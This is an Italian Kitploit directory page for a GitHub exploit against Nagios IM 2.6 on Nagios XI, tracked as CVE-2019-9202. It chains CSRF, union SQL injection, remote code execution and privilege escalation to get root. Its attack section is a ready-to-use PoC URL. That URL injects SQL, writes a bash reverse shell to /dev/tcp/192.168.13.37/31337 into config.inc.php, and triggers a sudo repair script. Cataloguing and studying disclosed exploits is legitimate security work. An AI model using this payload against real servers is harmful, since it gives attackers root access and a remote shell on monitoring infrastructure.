Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-9202 — Exploit di esecuzione remota di codice per Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> root remoto | Kitploit
Strumenti/GitHubGitHub/polict/cve-2019-9202
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubpolict/cve-2019-9202

CVE-2019-9202

Exploit di esecuzione remota di codice per Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> root remoto

Vedi Repository
47 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-9202

Exploit di esecuzione remota di codice in Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> root remota

Descrizione

Combinando una Cross-Site Request Forgery (CSRF) / bypass dell'autorizzazione (CVE-2019-9203) è possibile sfruttare una SQL injection di tipo Union (CVE-2019-9204), una Remote Code Execution (RCE) (CVE-2019-9202) e una Local Privilege Escalation (LPE) (CVE-2019-9166), ottenendo privilegi di root su un server Nagios XI remoto.

Requisiti

La vittima deve essere autenticata in Nagios XI; per quanto ne so, bastano i privilegi più bassi.

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

Scarica lo strumento